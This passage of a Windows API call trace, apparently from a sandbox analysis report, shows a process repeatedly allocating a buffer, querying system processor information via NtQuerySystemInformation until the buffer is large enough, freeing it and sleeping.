ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0173.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0173.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0173.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0173.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0173.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.394] Sleep (dwMilliseconds=0x110) [0173.416] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0173.416] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.418] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.418] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0173.422] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0173.423] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0173.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0173.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0173.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.426] Sleep (dwMilliseconds=0x110) [0173.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0173.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0173.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0173.443] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.443] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0173.443] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0173.444] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.444] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0173.445] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.445] Sleep (dwMilliseconds=0x110) [0173.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0173.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0173.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0173.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0173.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0173.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0173.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.491] Sleep (dwMilliseconds=0x110) [0173.553] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0173.553] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.554] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0173.558] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.558] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0173.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0173.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0173.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0173.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.643] Sleep (dwMilliseconds=0x110) [0173.679] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0173.679] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.680] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.681] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0173.681] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.681] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.682] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0173.682] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.682] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.683] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0173.683] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0173.683] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.684] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0173.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.685] Sleep (dwMilliseconds=0x110) [0173.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0173.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0173.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0173.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0173.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0173.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0173.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.738] Sleep (dwMilliseconds=0x110) [0173.947] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0173.947] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.948] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.949] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0173.949] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.949] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0173.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0173.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0173.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0173.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.954] Sleep (dwMilliseconds=0x110) [0173.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0173.975] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.976] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0173.977] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.977] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.977] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0173.977] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.978] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.978] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0173.978] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0173.979] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.979] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0173.980] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.980] Sleep (dwMilliseconds=0x110) [0174.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0174.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.008] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0174.008] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.009] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0174.009] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.009] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.010] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0174.010] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0174.010] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.011] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0174.012] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.012] Sleep (dwMilliseconds=0x110) [0174.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0174.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0174.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0174.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.038] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0174.038] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0174.039] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.039] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0174.040] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.040] Sleep (dwMilliseconds=0x110) [0174.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0174.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0174.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0174.052] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0174.052] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0174.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.053] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0174.054] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.054] Sleep (dwMilliseconds=0x110) [0174.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0174.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.071] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0174.071] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.072] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.073] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0174.073] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.074] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.074] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0174.074] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0174.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0174.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.078] Sleep (dwMilliseconds=0x110) [0174.369] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0174.369] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.370] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.370] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0174.371] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.371] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0174.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0174.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0174.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0174.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.377] Sleep (dwMilliseconds=0x110) 